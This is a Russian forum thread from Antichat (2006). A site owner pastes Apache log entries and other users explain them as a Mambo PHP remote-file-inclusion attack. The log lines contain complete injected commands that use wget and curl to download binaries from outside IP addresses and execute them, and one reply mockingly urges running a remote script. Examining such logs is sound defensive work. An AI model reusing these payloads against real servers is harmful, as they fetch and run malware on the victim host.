ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Windows
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Объясните логи апач сервера
  #1  
Старый 03.04.2006, 21:52
andre
Новичок
Регистрация: 26.03.2006
Сообщений: 22
Провел на форуме:
119833

Репутация: 5
По умолчанию Объясните логи апач сервера

Обнаружил у себя в логах такие вот записи

24.20.104.181 - - [03/Apr/2006:20:46:46 +0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2. php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 296

24.20.104.181 - - [03/Apr/2006:20:46:48 +0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.p hp?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 200 42194

24.20.104.181 - - [03/Apr/2006:20:46:50 +0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 302

объсните что пытались сделать?
 

  #2  
Старый 03.04.2006, 21:55
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

пытались ломануть =)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #3  
Старый 03.04.2006, 21:57
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

Пытались выполнить команды и залить шелл. Это php инклудинг!
 

  #4  
Старый 03.04.2006, 21:57
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

лол, самому сложно понять, что пытались сделать?
 

  #5  
Старый 03.04.2006, 21:57
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

пытались поломать твою мамбу с помощью php инклуда
1 и 3 страница не существует, на второй не работает адреса загрузки
 

  #6  
Старый 03.04.2006, 21:57
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию

Это новая фишка в apache. Называется "вселенский разум". Теперь apache сам скачивает то что ему надо и откуда над.
Это как-раз видно по логам, wget фигурирует.


зы
тебя похачили.
 

  #7  
Старый 03.04.2006, 21:58
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

пытались залить тебе сплойт
 

  #8  
Старый 03.04.2006, 22:11
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

Помоги ребятам, запусти этот файлик _http://72.34.42.241/~dancing/bash )
 

  #9  
Старый 03.04.2006, 22:24
Allen
Постоянный
Регистрация: 24.10.2005
Сообщений: 367
Провел на форуме:
686219

Репутация: 26
По умолчанию

У тебя мамба целая?
А то её собирались ломнуть.
 

  #10  
Старый 03.04.2006, 22:40
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

сколько человек еще скажет, что его пытались ломануть?
делаем ставки господа!
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Чистим логи rent0n *nix 4 30.04.2009 19:22
О взломе лог файлов Frok Чужие Статьи 5 07.03.2006 23:02
софт для удаленного сервера _lolik_ Уязвимости 6 05.02.2006 10:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ